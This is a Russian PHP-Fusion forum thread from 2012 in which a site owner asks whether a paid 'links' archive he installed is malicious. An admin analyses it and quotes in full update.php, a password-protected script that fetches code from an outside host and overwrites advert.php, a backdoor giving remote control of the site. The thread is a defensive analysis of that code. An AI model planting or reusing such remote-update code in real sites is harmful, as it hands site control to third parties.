Форум: Опасения - PHP-Fusion Russia

Просмотр темы

PHP-Fusion Russia » Поддержка 7 версии » Вопросы новичков

Опасения
Footer	#1 Опубликовано 01.10.2012 19:41
Пользователь Сообщений: 134 Зарегистрирован: 01.09.2010 10:40	Привет, друзья. Недавно одна дама с адреса yuliahalikova@yandex.ru прислала письмо с предложением размещения у меня на сайте некой информации с переменными ссылками, за кэш естессвенно. Как-то давно уже делал подобное, и подвоха не заподозрил. Разместить надо было в корне сайте содержимое этого архива. Сделал, тётка пропала. Но с сайтом стали твориться чудеса - яндекс на него заругался и исключил из мониторинга. Вдруг пользователь сегодня обнаружился забаненный, чего я не делал. Опасаюсь я. Удалил конечно херь, пароли сменил, но мало ли. Кто сечет в кодах, гляньте, паранойя это или на самом деле болт? Footer присоединено следующее:файл: linksbase.rar [2.71кБ / 373 Загрузки] Все люди на свете разные, только я один такой одинаковый


Chief	#2 Опубликовано 01.10.2012 19:53
Персонал сайта Сообщений: 206 Зарегистрирован: 22.06.2011 15:00	C виду обычная баннерокрутилка с кэшем. Яндекс чужие линкопомойки не одобряет, поддерживает собственного производителя, поэтому и вылетел из индекса. У богатых людей — большая библиотека. У бедных людей — большой телевизор.
	x1


Rush	#3 Опубликовано 01.10.2012 20:09
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41	очень интересно, такого бреда сумасшедшего давно не разбирал) сам по себе файл advert.php опасности не представляет. с определенной периодичностью он долбится на http://linksbase.ru/links/".$m_host, получает некоторые данные и пишет их в файл db. потом эта фигня разбирается и якобы выводятся ссылки. но это могут быть к примеру и не ссылки, а джабаскрипт, а тут на лицо xss. но больше всего меня заинтересовал файл update.php, точнее след. код GeSHi: PHP $m_host = $_SERVER['HTTP_HOST']; $pass = isset($_GET["pass"]) ? $_GET["pass"] : ""; $md5 = "d7af994f1f1ef8b5e3beb9f7fb139f57"; if (md5($pass) != $md5) die ("Password incorrect"); $fcont = @GetContent("http://linksbase.ru/scripts/".$m_host) or $fcont = ""; if($fcont == "") die ("File not found"); $fname = dirname(__FILE__)."/advert.php"; $fptr = @fopen($fname, "w+"); @fwrite($fptr, $fcont) or die ("File save error"); @fclose($fptr) or die ("File close error"); echo date( "H:i:s, d/m/Y", filemtime($fname) ); Добавлено за 0.025 секунд, используя GeSHi 1.0.8.10 если некое лицо зайдет на update.php?pass=d7af994f1f1ef8b5e3beb9f7fb139f57, то скрипт долбиться уже на http://linksbase.ru/scripts/".$m_host и по сути изменяет код файла advert.php. короче тут целая панацея, при желании с твоим сайтом можно сделать ВСЕ что угодно. причем все сделано в открытую, уже бы по старинке сделали через обфусцированный js. Итог: идея: 3 реализация: 2 аудитория пользователей: лох (без обид конечно, могу продать ускоритель интернета, еще один завалялся, разбирают капец))) AnnetLab \| @annetlab \| GitHub Addons repo \| AL Shop - open source e-shop for PHP-Fusion \| PHPtoday.ru
	x1
	Web

Rush	#4 Опубликовано 01.10.2012 20:15
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41	даже удалять не буду, может в блоге когда нибудь напишу про такую шляпу) AnnetLab \| @annetlab \| GitHub Addons repo \| AL Shop - open source e-shop for PHP-Fusion \| PHPtoday.ru
	Web

Polarfox	#5 Опубликовано 01.10.2012 21:29
Администратор Разработчики Группа поддержки Сообщений: 3384 Зарегистрирован: 20.08.2010 14:03	Если платит нормально можно переписать клиент чтобы не запалила Юльчик, и пусть себе работает. Как только - так исключение, и вместо левака - пустое место. Всегда делайте backup перед изменениями \| Указывайте свою версию в подписи/профиле. \| Вся бесплатная тех. поддержка только на форуме


Dysha-Kuzbass	#6 Опубликовано 02.10.2012 19:55
Пользователь Сообщений: 114 Зарегистрирован: 07.09.2011 10:01	*Оффтопик* напишу про такую шляпу) Rush, такую же, как у тя на аватаре?! (Мэн, не в обиду!) Едет вебмастер в поезде и слышит: <td></td> … <td></td> … <td></td>
	Web

Footer	#7 Опубликовано 02.10.2012 21:00
Пользователь Сообщений: 134 Зарегистрирован: 01.09.2010 10:40	лох и лох, отрицать не буду. что мне этот код даст, если я в нем секу так же как в нотной грамоте? вопрос главный: через эту шнягу они все мои пароли узнали? если да, то если я удалил эту папку и сменил пароли, можно не опасаться? Изменил(а) Footer, 02.10.2012 21:10 Все люди на свете разные, только я один такой одинаковый


Rush	#8 Опубликовано 03.10.2012 13:05
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41	пароли от чего? в базе все захешировано. пароли они врядли могут узнать. AnnetLab \| @annetlab \| GitHub Addons repo \| AL Shop - open source e-shop for PHP-Fusion \| PHPtoday.ru
	Web

Footer	#9 Опубликовано 04.10.2012 19:34
Пользователь Сообщений: 134 Зарегистрирован: 01.09.2010 10:40	от всего. от админки, от закрытых тем форума. не могли узнать при помощи этой бодяги? Все люди на свете разные, только я один такой одинаковый


Rush	#10 Опубликовано 05.10.2012 07:12
Администратор Разработчики Группа поддержки Сообщений: 1418 Зарегистрирован: 31.08.2010 14:41	интересный вопрос, но скорее всего нет AnnetLab \| @annetlab \| GitHub Addons repo \| AL Shop - open source e-shop for PHP-Fusion \| PHPtoday.ru
	Web

Chief	#11 Опубликовано 05.10.2012 08:08
Персонал сайта Сообщений: 206 Зарегистрирован: 22.06.2011 15:00	Rush, разве что "умным" скриптом получили хэш "user_admin_password" и "user_admin_salt" - почесали затылки, и отправили все это в облака на дешифровку У богатых людей — большая библиотека. У бедных людей — большой телевизор.

Поделиться этой темой
Социальные закладки:
URL:
BBcode:
HTML:

Перейти на форум: